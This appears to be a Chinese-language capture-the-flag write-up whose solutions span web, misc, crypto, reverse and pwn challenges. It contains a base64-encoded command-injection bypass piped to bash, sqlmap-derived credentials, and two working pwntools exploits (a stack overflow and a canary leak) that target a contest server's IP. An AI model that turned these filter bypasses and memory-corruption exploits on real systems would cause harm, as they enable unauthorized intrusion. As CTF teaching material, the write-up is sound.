WEB
简单的注入
打开题目并没有明显的注入点
dirb扫描出robots.txt文件
访问得到提示
分别访问,一个登陆页面,一个注入页面
直接使用sqlmap来跑,得到账号admin456密码dasctfyyds123
使用跑出来的账号密码登录之前的页面,等待三秒获得flag
ping
直接使用管道符连接查看根目录发现flag文件
直接cat flag发现不行
抓包查看,发现过滤掉了flag、*、?等
通配符行不通,所以使用base编码进行绕过,payload:echo Y2F0IC9mbGFn|base64 -d|bash
hasai
php强类型比较,直接用输入绕过就行
MISC
FTPPPP
题目给出了提示,关注密码,直接wireshark搜索即可
eight_birds
题目提示八只鸟,附件图片只有五只,猜测需要修改图片高度
010修改高度后看到字符,继续往下拉,底部发现有压缩包文件
直接修改图片后缀为zip,使用图片中的字符串解压,得到flag.txt
根据压缩密码的提示,affine,以及a19,b21,猜测是仿射密码,解密得到flag
stealer
打开流量包,过滤DNS,发现有很多重复的数据,过滤ip
将内容取出,观察发现是图片的base64编码,将无用的字符Standard query 0x6a7a A、ctf.com.cn OPT和-去掉
然后将*替换为+后转换为图片
CRYPTO
affext
from Crypto.Util.number import *
import random
tables = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}'
flag = 'DASCTF{%s}'%("".join(random.sample(tables[:-2], 32)))
tables = "".join(random.sample(tables, len(tables)))
print('tables =', tables)
a = getPrime(6)
b = getPrime(6)
c = ''
for i in range(len(flag)):
c += tables[(a * (len(tables) - 1 - tables.find(flag[i])) + b) % len(tables)]
print('c =', c)
'''
tables = zuSYnb}O1{VoARpPDMgmKwiWZUxde9qNQkL30sTtJvjBH658Er4yhCXafc7G2IlF
c = h17d}vaMUGgNy}ioSD9B8Fvm12qOsXbc6LPzAKQT
'''
算出ab值,然后带入c中进行倒推即可
from Crypto.Util.number import *
tables = 'zuSYnb}O1{VoARpPDMgmKwiWZUxde9qNQkL30sTtJvjBH658Er4yhCXafc7G2IlF'
c = 'h17d}vaMUGgNy}ioSD9B8Fvm12qOsXbc6LPzAKQT'
list = [37, 41, 43, 47, 53, 59, 61, 67]
flag = ''
for a in list:
for b in list:
if 52 == (a * (64 - 1 - 16) + b) % 64 and 8 == (a * (64 - 1 - 12) + b) % 64:
for i in range(len(c)):
flag += tables[(len(tables) - 1 - (tables.find(c[i]) - b) % 64 * inverse(a, 64)) % len(tables)]
print(flag)
rsa9
from Crypto.Util.number import *
import binascii
import gmpy2
flag = '*********************'
hex_flag=int(flag.encode("hex"),16)
p=getPrime(512)
q=getPrime(512)
n=p*q
e=0x3
c=pow(hex_flag,e,n)
print("n=",hex(n))
print("e=",hex(e))
print("c=",hex(c))
'''
('n=', '0x86f4be77b79e166a6311e7982ba2e5ff479db93a01c56034479a9e35382293c35769da222974e9425829099aa4fe4f41185283866202042b356194bab312e6ed2fb0b10b1b74767dc1cc5306872d33b1f3b75612c594751ec70e4cf5fccc6fceafe0401648869cc40425a176ab70286d92a29dfd675f2384c9383e0a9750b25bL')
('e=', '0x3')
('c=', '0x10652cdf7ed2bc53f58b321f476c3a3cf3281e541f4d533a73a0fcbf525230f2e01c183dee660676317ea99250202548e5525b0c14adbeb77d4fa7e2e1d339L')
'''
已知n、e、c,其中n=p*q,正常应该分解n为p和q,再进行计算,但是,n太大,yafu无法分解,这里e的值很小,为3,猜测应该是小明文分解
先将n,e,c都转换为十进制
n=94769348041557949631066992681248374245419599063572386903701806390529231509719354984024221562917404135160853809938505961371941524101274299389094565807401359089942764397812436886303691664293894074265241895767317138963199946016477485556305687692983444678324548099386990670635764441695771144643477049963023741531
e=3
c=3354246620726085986568668128373090812593945499332956611216503173394622300212425527028396698978553852269462669721310427515531023131901147683787903193913
然后编写分解脚本:
import gmpy2
from Crypto.Util.number import long_to_bytes
def small_msg(e, n, c):
for k in range(200000000):
if gmpy2.iroot(k*n + c, e)[1]:
return gmpy2.iroot(k*n + c, e)[0]
return False
e = 3
n = 94769348041557949631066992681248374245419599063572386903701806390529231509719354984024221562917404135160853809938505961371941524101274299389094565807401359089942764397812436886303691664293894074265241895767317138963199946016477485556305687692983444678324548099386990670635764441695771144643477049963023741531
cipher = 3354246620726085986568668128373090812593945499332956611216503173394622300212425527028396698978553852269462669721310427515531023131901147683787903193913
msg = small_msg(3, n, cipher)
print(long_to_bytes(msg))
将得到的值进行md5,便是flag
REVERSE
intertwine
PEID打开,32位
使用IDA32位进行分析,找到main函数F5查看伪代码
分析代码后,发现就是个很简单的嵌套循环
v9的值依次*16并加上str,如果刚好等于v8的值,就表示flag正确,伪代码中,v9,v8的值都知道,程序逻辑也知道,直接写脚本倒推算出str的值便可
v9 = [133, 113, 68, 124, 67, 27, 148, 63, 121, 165, 61, 54, 83, 66, 96, 87, 104, 97, 49, 54, 115, 27, 97, 17, 113, 126,
51, 25, 61, 115, 32, 1]
v8 = [
44512, 44288, 44288, 44000, 44320, 44000, 44288, 43008, 44736, 44192, 44000, 44448, 44064, 44480, 44832, 44000,
44224, 44064, 44480, 44672, 44064, 42656, 44672, 44320, 44128, 44000, 44480, 44704, 44448, 43072, 44192, 44608]
for i in range(32):
v7 = 0
for j in range(32):
v7 += 16 * v9[j]
print(chr(int((v8[i] - v7) / 32)), end='')
ez_apk
使用jadx-gui打开apk,资源文件res/values/strings.xml中发现cipher和key
右键跳转到com.example.re2.MainActivity
分析后,发现异或以及维吉尼亚
将cipher异或后,使用key进行维吉尼亚解密
得到flag{ez_crypto_algorithm_reverse_haha}
easyre
IDA32打开,shift+F12直接看到flag
PWN
easy_pwn
使用IDApro(32位)打开文件并查看Main函数伪代码
main()函数中存在关键函数message()的调用,然后查看message()函数的伪代码
发现存在无限字节的栈溢出,接下来通过覆盖char s [28]和 rbp再添加shellcode_addr即可getshell,发现程序中存在flag()后门函数地址为0x08048519
exp:
from pwn import *
r = remote('101.42.165.118',20001)
shellcode_addr = 0x08048519
payload = b'X' * 32 + p32(shellcode_addr)
r.sendline(payload)
r.interactive()
ez_canary
使用IDApro(64位)打开文件并查看Main函数伪代码
main()函数中存在关键函数vuln()的调用,然后我们查看vuln()函数的伪代码
要先泄露Canary然后再构造Payload,发现char v4[10] 此时我们只需要利用read()函数填充v4为11即可泄露Canary,然后我们我们再通过下一个read()函数发送payload = padding + cannary + padding + shell_addr 即可getshell
exp:
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
io = remote('101.42.165.118', 20002)
payload = b'a' * 11
io.send(payload)
io.recvuntil('a' * 11)
canary = u64('\x00' + io.recv(7))
log.success('Canary:\t' + hex(canary))
payload2 = b'a' * 20 + p64(canary) + b'a' * 8 + p64(0x000000000040121E)
io.send(payload2)
io.interactive()
#DASCTF{9c565f3584a8e7ad64a73996b615811b}